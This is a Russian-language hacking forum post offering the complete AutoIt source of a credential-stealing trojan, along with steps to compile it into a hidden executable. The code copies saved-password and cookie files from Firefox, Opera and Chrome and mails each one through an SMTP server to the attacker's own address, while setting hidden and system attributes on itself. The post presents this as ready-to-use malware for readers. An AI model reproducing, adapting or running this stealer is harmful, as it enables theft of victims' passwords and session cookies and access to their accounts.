Этот трой который ворует файлы с паролями от браузеров как Opera , Mozilla Firefox и Google Chrome !!!
Этот трой написан на языке AutoIt так что топаем в википедию
Не надо создавать никаких самораспаков и добавлять программу Blat для отсылки логов! все делается одним кликом так сказать!!! Вам для этого нужно Скачать пакет Autoit-v3 и установить на вашей тачке для того чтоб смогли скапилировать в exe!!! ниже объяснение как это делается!
И так сам исходник!!!
Скрытый текст:
#NoTrayIcon ; скрываем иконку
#include <File.au3> ; инклудим нужные библиотеки
#include <Inet.au3>
#Include <process.au3>;Заполнить
$sFile = ""
$SmtpServer = "smtp.yandex.ru" ; адрес SMTP сервера
$FromName = ""
$FromAddress = " ваш логин@yandex.ru" ; адрес отправителя
$ToAddress = "ваш логин@yandex.ru" ; адрес получателя
$Subject = "http://worldhacker.0pk.ru" ; тема письма
$AttachFiles =""
$sText="Привет от http://worldhacker.0pk.ru (_XuMuK_) " ;тело письма
$CcAddress = ""
$BccAddress = ""
$Importance = "Normal" ; приоритет отсылки письма,другие варианты: "High", "Normal", "Low"
$Username = "ваш логин@yandex.ru" ; имя отправителя
$Password = "ваш пароль" ; пас отпрвителя
$IPPort = 587 ; порт можно 25,ну и так норм отправляет
$ssl = 0 ;сокет
;~ $IPPort=465; GMAIL порт
FileSetAttrib ( @ScriptName, "+SRAH") ; ставим атрибуты на скрипт
DirCreate(@ScriptDir & "\winsc" ) ; создаём папку winsc чтоб потом все файлы копировались туда и отправлялись на почту
FileSetAttrib ( @ScriptDir & "\winsc" , "+SRAH") ; ставим атрибуты на папку winsc
$var = Ping("www.google.com",250) ; пингуем google для проверки есть ли инетIf @error = 0 Then ; если инет есть то скрипт начинает работать
_RunDOS ( "copy /y %AppData%\Mozilla\Firefox\Profiles\*.default\key3.db \winsc" ) ; при помощи _RunDOS используем команду из CMD так как AutoIt не распознает путь *.default
$AttachFiles = @ScriptDir & "\winsc\key3.db" ; приписываем скопированный файл к телу письма
$FromName = "Mozilla (key3.db)" ; имя письма
_FileWriteLog($AttachFiles,$sFile) ; пишет в лог без этого файл не отправится))
; далее вызываем функцию отправки
_INetSmtpMailCom($SmtpServer,$FromName,$FromAddress,$ToAddress,$Subject,$sText,$AttachFiles,$CcAddress,$BccAddress,$Importance,$Username,$Password,$IPPort,$ssl)
Sleep(1000) ; пауза на секунду(в принципе можно и меньше)
_RunDOS ( "copy /y %AppData%\Mozilla\Firefox\Profiles\signons.sqlite \winsc" )
$AttachFiles = @ScriptDir & "\winsc\signons.sqlite"
$FromName = "Mozilla (signons.sqlite)"
_FileWriteLog($AttachFiles,$sFile)
_INetSmtpMailCom($SmtpServer,$FromName,$FromAddress,$ToAddress,$Subject,$sText,$AttachFiles,$CcAddress,$BccAddress,$Importance,$Username,$Password,$IPPort,$ssl)
Sleep(1000)
_RunDOS ( "copy /y %AppData%\Mozilla\Firefox\Profiles\*.default\cookies.sqlite \winsc")
$AttachFiles = @ScriptDir & "\winsc\cookies.sqlite"
$FromName = "Mozilla (cookies.sqlite)"
_FileWriteLog($AttachFiles,$sFile)
_INetSmtpMailCom($SmtpServer,$FromName,$FromAddress,$ToAddress,$Subject,$sText,$AttachFiles,$CcAddress,$BccAddress,$Importance,$Username,$Password,$IPPort,$ssl)
Sleep(1000)
; переходим на оперу
$AttachFiles = @AppDataDir & "\Opera\Opera\wand.dat" ; приписываем файл wand.dat к телу письма
$FromName = "Opera (wand.dat)"
_FileWriteLog($AttachFiles,$sFile)
_INetSmtpMailCom($SmtpServer,$FromName,$FromAddress,$ToAddress,$Subject,$sText,$AttachFiles,$CcAddress,$BccAddress,$Importance,$Username,$Password,$IPPort,$ssl)Sleep(1000)
$AttachFiles = @AppDataDir & "\Opera\Opera\cookies4.dat"
$FromName = "Opera (cookies4.dat)"
_FileWriteLog($AttachFiles,$sFile)
_INetSmtpMailCom($SmtpServer,$FromName,$FromAddress,$ToAddress,$Subject,$sText,$AttachFiles,$CcAddress,$BccAddress,$Importance,$Username,$Password,$IPPort,$ssl)
Sleep(1000); переходим на хром
FileCopy( @UserProfileDir & "\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data", @ScriptDir & "\winsc", 1 ) ; копируем файл Web Data в папку winsc$AttachFiles = @ScriptDir & "\winsc\Web Data"
$FromName = "Chrome (Web Data)"
_FileWriteLog($AttachFiles,$sFile)
_INetSmtpMailCom($SmtpServer,$FromName,$FromAddress,$ToAddress,$Subject,$sText,$AttachFiles,$CcAddress,$BccAddress,$Importance,$Username,$Password,$IPPort,$ssl)Sleep(1000)
FileCopy( @UserProfileDir & "\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data", @ScriptDir & "\winsc", 1 )
$AttachFiles = @ScriptDir & "\winsc\Login Data"
$FromName = "Chrome (Login Data)"
_FileWriteLog($AttachFiles,$sFile)
_INetSmtpMailCom($SmtpServer,$FromName,$FromAddress,$ToAddress,$Subject,$sText,$AttachFiles,$CcAddress,$BccAddress,$Importance,$Username,$Password,$IPPort,$ssl)Sleep(1000)
DirRemove(@ScriptDir & "\winsc", 1 ) ; удаляем папку winsc
EndIf
; ниже функция отправки
Func _INetSmtpMailCom($s_SmtpServer, $s_FromName, $s_FromAddress, $s_ToAddress, $s_Subject = "", $as_Body = "", $s_AttachFiles = "", $s_CcAddress = "", $s_BccAddress = "", $s_Importance="Normal", $s_Username = "", $s_Password = "", $IPPort = 25, $ssl = 0)
Local $objEmail = ObjCreate("CDO.Message")
$objEmail.From = '"' & $s_FromName & '" <' & $s_FromAddress & '>'
$objEmail.To = $s_ToAddress
Local $i_Error = 0
Local $i_Error_desciption = ""
If $s_CcAddress <> "" Then $objEmail.Cc = $s_CcAddress
If $s_BccAddress <> "" Then $objEmail.Bcc = $s_BccAddress
$objEmail.Subject = $s_Subject
If StringInStr($as_Body, "<") And StringInStr($as_Body, ">") Then
$objEmail.HTMLBody = $as_Body
Else
$objEmail.Textbody = $as_Body & @CRLF
EndIf
If $s_AttachFiles <> "" Then
Local $S_Files2Attach = StringSplit($s_AttachFiles, ";")
For $x = 1 To $S_Files2Attach[0]
$S_Files2Attach[$x] = _PathFull($S_Files2Attach[$x])
;~ ConsoleWrite('@@ Debug : $S_Files2Attach[$x] = ' & $S_Files2Attach[$x] & @LF & '>Error code: ' & @error & @LF) ;### Debug Console
If FileExists($S_Files2Attach[$x]) Then
ConsoleWrite('+> File attachment added: ' & $S_Files2Attach[$x] & @LF)
$objEmail.AddAttachment($S_Files2Attach[$x])
Else
ConsoleWrite('!> File not found to attach: ' & $S_Files2Attach[$x] & @LF)
SetError(1)
Return 0
EndIf
Next
EndIf
$objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
$objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpserver") = $s_SmtpServer
If Number($IPPort) = 0 then $IPPort = 25
$objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = $IPPort
;Authenticated SMTP
If $s_Username <> "" Then
$objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
$objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendusername") = $s_Username
$objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendpassword") = $s_Password
EndIf
If $ssl Then
$objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = True
EndIf
;Update settings
$objEmail.Configuration.Fields.Update
; Set Email Importance
Switch $s_Importance
Case "High"
$objEmail.Fields.Item ("urn:schemas:mailheader:Importance") = "High"
Case "Normal"
$objEmail.Fields.Item ("urn:schemas:mailheader:Importance") = "Normal"
Case "Low"
$objEmail.Fields.Item ("urn:schemas:mailheader:Importance") = "Low"
EndSwitch
$objEmail.Fields.Update
; Sent the Message
$objEmail.Send
If @error Then
SetError(2)
Return $oMyRet[1]
EndIf
$objEmail=""
EndFunc ;==>_INetSmtpMailComexit
Где вводить логин и пасс отмеченно красным!
И так устанавливаем Autoit-v3 и у нас в проводнике в пункте создать появится строка Autoit-v3 Script
Кликаем на него и создаем файл и открываем его (правый клик Edit Script) и вставляем туда наш исходник и вписываем логин и пасс от мыло и закрываем!!! Потом так же держим на него и правый клик "Compile Script"!!!
Все наш трой готов! (367kb)
После запуска он сам на себя ставит приоритеты то есть грубо говоря исчезает!
Трой будет полезным для тех кто ленится делать самараспаки или вообще не может их делать!
Пока что все
чему?